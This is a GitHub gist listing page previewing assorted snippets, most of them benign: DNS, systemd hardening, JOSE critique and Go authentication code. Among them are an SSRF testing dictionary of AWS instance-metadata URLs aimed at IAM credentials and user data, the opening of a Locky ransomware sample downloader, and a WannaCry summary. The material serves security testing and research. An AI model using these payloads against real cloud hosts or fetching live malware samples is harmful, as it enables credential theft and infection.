Skip to content

Instantly share code, notes, and snippets.

View Zenithar's full-sized avatar

Thibault NORMAND Zenithar

View GitHub Profile
@alxrdn
alxrdn / dnsmasq_https_rr.py
Last active June 6, 2024 02:52
Generate dnsmasq configuration for HTTPS resource records (RFC 9460)
import dns.rdata # pip3 install dnspython
import io
name = "host.example.com."
rclass = dns.rdataclass.IN
rtype = dns.rdatatype.HTTPS
rdata = '1 . alpn="h3,h2" ipv4hint="XXX.XXX.XXX.XXX"'
rd = dns.rdata.from_text(rclass, rtype, rdata)
@jhaddix
jhaddix / cloud_metadata.txt
Last active October 27, 2024 18:33 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@paragonie-scott
paragonie-scott / jose-security.md
Last active June 12, 2020 11:32
Suggestions for a Secure JOSE Alternative (or Protocol Upgrade)

Changes to JOSE that will prevent insecurity

Deletions

JWS and JWE

Drop the alg header

Neither JOSE users nor JOSE library designers should be required to understand cryptography primitives. At a lower level, this can lead to badly implemented primitives. On a higher level, this can lead to reasoning by lego.

@ageis
ageis / systemd_service_hardening.md
Last active November 15, 2024 09:28
Options for hardening systemd service units

security and hardening options for systemd service units

A common and reliable pattern in service unit files is thus:

NoNewPrivileges=yes
PrivateTmp=yes
PrivateDevices=yes
DevicePolicy=closed
ProtectSystem=strict
@augbog
augbog / Free O'Reilly Books.md
Last active July 23, 2024 15:24
Free O'Reilly Books

Free O'Reilly books and convenient script to just download them.

Thanks /u/FallenAege/ and /u/ShPavel/ from this Reddit post

How to use:

  1. Take the download.sh file and put it into a directory where you want the files to be saved.
  2. cd into the directory and make sure that it has executable permissions (chmod +x download.sh should do it)
  3. Run ./download.sh and wee there it goes. Also if you do not want all the files, just simply comment the ones you do not want.
@mak
mak / get_locky.py
Created June 22, 2016 22:16
locky sample downloader
import sys
import hashlib
import struct
import requests
def decode(data,seed,step):
r = []
k = seed
for c in map(ord,data):
r.append(chr(c ^ k))
@ikwattro
ikwattro / statement.json
Created March 8, 2016 19:51
unwind batching
{
"statements": [
{
"statement": "UNWIND {nodes} as x MERGE (o:Object {um: x.umid}) SET o.value = x.value, o.updated = timestamp()",
"parameters": {
"nodes": [
{
"umid": 1,
"value": "bla bla"
},
@kwilczynski
kwilczynski / disable-ipv6.sh
Last active April 11, 2024 11:09
Amazon Linux OS tweaks
#!/bin/bash
set -u
set -e
set -o pipefail
export PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
cat <<'EOF' > /etc/modprobe.d/blacklist-ipv6.conf
@rgarcia
rgarcia / basic.go
Created June 11, 2014 17:27
golang basic auth transport
import (
"encoding/base64"
"fmt"
"net/http"
)
type BasicAuthTransport struct {
Username string
Password string
}